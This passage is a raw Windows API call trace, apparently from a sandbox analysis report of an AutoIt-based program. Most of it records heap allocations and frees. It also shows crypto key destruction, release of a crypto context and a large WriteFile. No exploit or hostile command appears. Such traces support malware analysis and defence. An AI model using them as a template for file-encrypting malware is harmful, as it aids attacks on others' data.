returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0242.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f392f8 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0242.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0242.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0242.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0242.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2cf58 | out: hHeap=0x970000) returned 1 [0242.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0242.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0242.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0242.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0242.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0242.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8c6d0 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0242.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0242.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0242.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0242.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0242.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0242.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0242.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0242.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f20bb8 | out: hHeap=0x970000) returned 1 [0242.411] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0242.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0242.411] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc398) returned 0x2e80330 [0242.412] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e98a70 | out: hHeap=0x970000) returned 1 [0242.413] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0242.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0242.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0242.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0242.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0242.414] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0242.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0242.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0242.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0242.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0242.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc398) returned 0x2f14818 [0242.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0242.416] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0xc398, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0xc398, lpOverlapped=0x0) returned 1 [0242.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0242.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0242.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0242.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0242.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0242.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0242.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0242.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0242.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0242.419] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0242.419] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0242.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0242.420] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.420] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0242.420] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0242.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0242.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e512b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0242.420] CryptDestroyKey (hKey=0xa872d0) returned 1 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0242.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0242.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0242.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0242.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0242.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0242.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0242.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0242.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0242.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0242.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0242.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0242.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.421] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.421] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0242.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0242.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0242.421] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0242.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0242.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0242.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0242.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0242.422] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0242.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0242.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0242.422] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0242.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0242.422] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0242.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0242.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0242.422] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0242.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0242.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.422] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.422] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0242.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.422] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0242.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0242.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0242.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0242.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0242.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0242.423] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.423] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0242.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0242.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0242.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0242.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0242.423] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0242.423] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0242.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0242.424] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0242.424] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0242.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0242.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0242.424] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0242.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0242.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0242.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0242.424] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0242.424] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.424] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0242.425] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0242.425] FreeLibrary (hLibModule=0x756e0000) returned 1 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0242.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0242.425] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0242.425] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0242.425] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0242.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0242.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0242.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0242.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0242.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0242.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0242.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: 